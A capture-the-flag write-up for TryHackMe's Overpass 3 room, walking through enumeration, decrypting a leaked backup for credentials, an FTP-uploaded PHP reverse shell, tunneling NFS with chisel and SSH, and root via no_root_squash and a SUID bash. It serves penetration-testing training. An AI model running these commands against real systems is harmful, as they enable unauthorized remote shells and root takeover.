Overpass 3-Hosting-TryHackMe

Please read this write-up here:-

https://0xsanz.medium.com/overpass-3-hosting-tryhackme-1a05e83b2261?sk=c1ba671621d1d7e6bc25f2de7792cc4e

This is the write-up for TryHackMe's room named Overpass3 - Hosting. This is the third part of the series of rooms named Overpass.

This room can be found at this URL:- https://tryhackme.com/room/overpass3hosting

So lets begin.

Enumeration

# Identify the list of services running on the target machine

sudo nmap -sS -Pn -T4 -p- 10.10.163.156

# Perform further information gathering on the open ports identified above

sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.163.156

So we have total 3 ports open.

Port 21 FTP vsftpd 3.0.3 doesn't have any know vulnerabilities and there is no anonymous access.

Port 22 SSH OpenSSH 8.0 is also quite recent. So lets keep it for later.

Port 80 have an Apache Web Server, so lets first try to brute force the directories on the Web Server.

Directory Busting

Lets use gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.163.156 -t 40

Ah, we have a folder named "backups". So lets browse to that folder using our favorite browser.

Download "backup.zip" file which we found above and unzip it.We found 2 files:

1. CustomerDetails.xlsx.gpg
2.  priv.key

OK,So we have a file encrypted with a gpg key. Let use the following command to get the actual file:

gpg --import priv.key

gpg CustomerDetails.xlsx.gpg

Which gives us:- CustomerDetails.xlsx. Open it with LibreOffice and we get some credentials.

Reverse Shell

Try these credentials with FTP and we will find that user "paradox" works.We can also see that the ftp directory allows us to upload files. We will upload a php reverse shell,execute it and will catch it with netcat.

ftp 10.10.163.156

put php-reverse-shell.php

Get the php reverse shell from:- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php and update it with your own attacker machine IP address and the port you want to catch the reverse shell.

Access web shell from the browser as:

http://10.10.163.156/php-reverse-shell.php

Catch the reverse shell as:

nc -nlvp 9999

We got a basic shell and lets stabilize the shell with the following commands:

/usr/bin/script -qc /bin/bash /dev/null

control+z to background

stty raw -echo

fg

export TERM=xterm

Now we have a fully working shell with "apache" user.

Web Flag

The web flag was a bit difficult to find, but ultimately found it using

find / -name *web* 2>/dev/null

Privilege Escalation

Now we have a stable shell,it is time to do privilege escalation. Transfer "linpeas.sh" to the target and run it to see if we can find anything that can help us in escalating our privileges:

On Attacker box:

python3 -m http.server 

On Target box: 

cd /tmp; curl http://YOUR-IP:8000/linpeas.sh > linpeas.sh

chmod +x linpeas.sh

./linpeash.sh

Get the latest linpeas.sh from:- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

Running linpeas.sh reveals few interesting things.

First:

So there is our know user "paradox" which also have a console,so may be reusing the password discovered from CustomerDetails.xlsx we can escalate to user "paradox".

su paradox

Indeed we can!
Second:

So the user "james" have a NFS setup with "no_root_squash".Linpeas is clearly indicating that this is a potential Privilege Escalation vector and if we following the link given we can find how to exploit it:- https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
If we run showmount from out attacking box on to the target,we get an error:

showmount -e 10.10.119.118

From the man page of showmount:- show mount information for an NFS server.Also the port which is usually used for NFS is 2049.Our initial NMAP scan also didn't revealed this port and show mount is giving us error. This indicates that something is blocking NFS. Lets confirm that if it is at all running on the target . We can transfer "netstat" from /usr/bin/ on kali box on to the target as both are 64 bit targets. Transfer netstat exe on to the target and run it like:

./netstat -tulnp

This confirms that NFS service is running on target but we cannot reach to it from our kali machine. So we can try tunneling to reach to NFS. Transferring dynamic exes may or may not work because of dependencies issues. An alternative method is to check the open tcp or udp ports by using the proc file system using command:

cat /proc/net/tcp

cat /proc/net/udp

Here values are shown in hexadecimal. 0x0801 is actually our NFS port 2049.

Tunneling

We will use an awesome tool called chisel to do our pivoting/tunneling.You can get the tool from here and build it using very simple instructions given in the tool's description: https://github.com/jpillora/chisel
Build and transfer chisel on to the target machine and run it on the kali and on the target as:

On kali:

./chisel server -p 8000 --reverse -v

So here we ran chisel as server,which is waiting for reverse connections from the target.
On target:

./chisel client 10.8.98.192:8000 R:2049:127.0.0.1:2049

This syntax deserves little bit of explanation. On the target - chisel is running as a client talking to the server(kali machine) at 10.221.98.192:8000 and forwarding the NFS port 2049 on 127.0.0.1 i.e. on the target on to the "R" reverse port i.e. port 2049 on kali machine.
Now from kali access the NFS port like:

sudo mount -vvvv -t nfs4  127.0.0.1:/  /mnt

Here little bit of research was required to access the nfs as it was version 4 and the mount syntax was also bit different to old nfs version. We were able mount /home/james on to /mnt on our attacking kali machine and got our user flag.

Now from here it is quite trivial to get the root.From kali machine,copy the bash binary as root and also give execute permissions to all for the bash binary as well as add a suid bit on bash and just run the binary on the target with "p" flag to get root.

On kali:

sudo chmod 777 /mnt

sudo cp /bin/bash /mnt

sudo chmod +s  /mnt/bash

On target:

/home/james/bash -p

cat /root/root.flag

We got our root flag.

We can also use SSH to do our tunneling. We need to create SSH keys pair on kali as the "paradox" user. We can make a dummy user paradox on kali and can create these keys using:

ssh-keygen

Then transfer id_rsa.pub on to target directory  /home/paradox/.ssh and then on the target run:

cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

chmod 644 id_rsa.pub

Then from kali make the SSH tunnel using the following command:

ssh -f -N -L 2049:localhost:2049 paradox@10.10.233.138 -i id_rsa

And mount the nfs directory as we did previously. Rest of the steps to get the root shell are same as in the above method where we used chisel for tunneling.

This was indeed a fun room and I enjoyed working on it. Hope you find this write up useful. Thanks for reading and have a good day :)